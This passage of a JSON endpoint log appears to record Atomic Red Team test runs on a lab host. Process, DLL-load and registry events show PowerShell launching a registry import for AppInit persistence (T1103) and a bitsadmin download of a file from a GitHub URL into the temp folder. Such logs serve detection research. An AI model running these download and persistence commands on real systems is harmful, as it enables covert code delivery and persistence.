{ + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "process", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "subtype": "terminate", + "timestamp": 131883570871990000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "file", + "file_name": "REGASM.EXE-8A092F8F.pf", + "file_path": "C:\\Windows\\Prefetch\\REGASM.EXE-8A092F8F.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883570872770000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "file", + "file_name": "CSC.EXE-F7BE4369.pf", + "file_path": "C:\\Windows\\Prefetch\\CSC.EXE-F7BE4369.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883570872770000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "file", + "file_name": "REGSVCS.EXE-ED64D53D.pf", + "file_path": "C:\\Windows\\Prefetch\\REGSVCS.EXE-ED64D53D.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883570872770000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg.exe import T1103.reg\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 6964, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570874900000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-00109C984D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6964, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570874800000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-00109C984D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6964, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570874800000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-00109C984D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6964, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570874800000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-00109C984D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6964, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570874800000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-00109C984D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6964, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570874800000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-00109C984D01}" + }, + { + "command_line": "reg.exe import T1103.reg", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1784, + "ppid": 6964, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883570874990000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}", + "unique_ppid": "{42FC7E13-CADF-5C05-0000-00109C984D01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 1784, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570874960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1784, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570874960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1784, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570874960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1784, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570874960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1784, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570874960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 1784, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570874960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 1784, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570874960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1784, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570874960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1784, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570874960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" + }, + { + "event_type": "process", + "pid": 1784, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883570874960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" + }, + { + "event_type": "process", + "pid": 6964, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570875110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-00109C984D01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 8152, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570875160000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-00100B9B4D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 8152, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570875110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-00100B9B4D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 8152, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570875110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-00100B9B4D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 8152, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570875110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-00100B9B4D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 8152, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570875110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-00100B9B4D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 8152, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570875110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-00100B9B4D01}" + }, + { + "event_type": "process", + "pid": 8152, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570875110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-00100B9B4D01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %%TEMP%%\\bitsadmin_flag.ps1\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 2108, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570876240000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2108, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570876210000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2108, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570876210000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2108, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570876210000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2108, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570876210000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2108, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570876210000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}" + }, + { + "command_line": "bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\\Users\\bob\\AppData\\Local\\Temp\\bitsadmin_flag.ps1", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5868, + "ppid": 2108, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "subtype": "create", + "timestamp": 131883570876330000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}", + "unique_ppid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "image_load", + "image_name": "bitsadmin.exe", + "image_path": "C:\\Windows\\System32\\bitsadmin.exe", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876210000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\System32\\sspicli.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + 